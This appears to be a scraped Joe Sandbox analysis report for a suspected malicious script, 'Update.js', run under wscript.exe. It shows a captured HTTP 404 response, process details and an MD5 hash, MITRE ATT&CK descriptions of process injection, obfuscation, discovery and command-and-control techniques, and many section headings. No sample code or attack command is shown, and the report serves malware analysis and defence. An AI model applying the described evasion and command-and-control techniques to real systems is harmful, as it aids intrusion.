2023-11-29 16:42:22 UTC	209	IN	Data Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
2023-11-29 16:42:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Statistics

CPU Usage

• wscript.exe

Click to jump to process

Memory Usage

• wscript.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Target ID:	0
Start time:	17:42:11
Start date:	29/11/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js"
Imagebase:	0x7ff770c90000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Update.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: wscript.exePID: 6180, Parent PID: 1028

General

File Activities

Windows Analysis Report
Update.js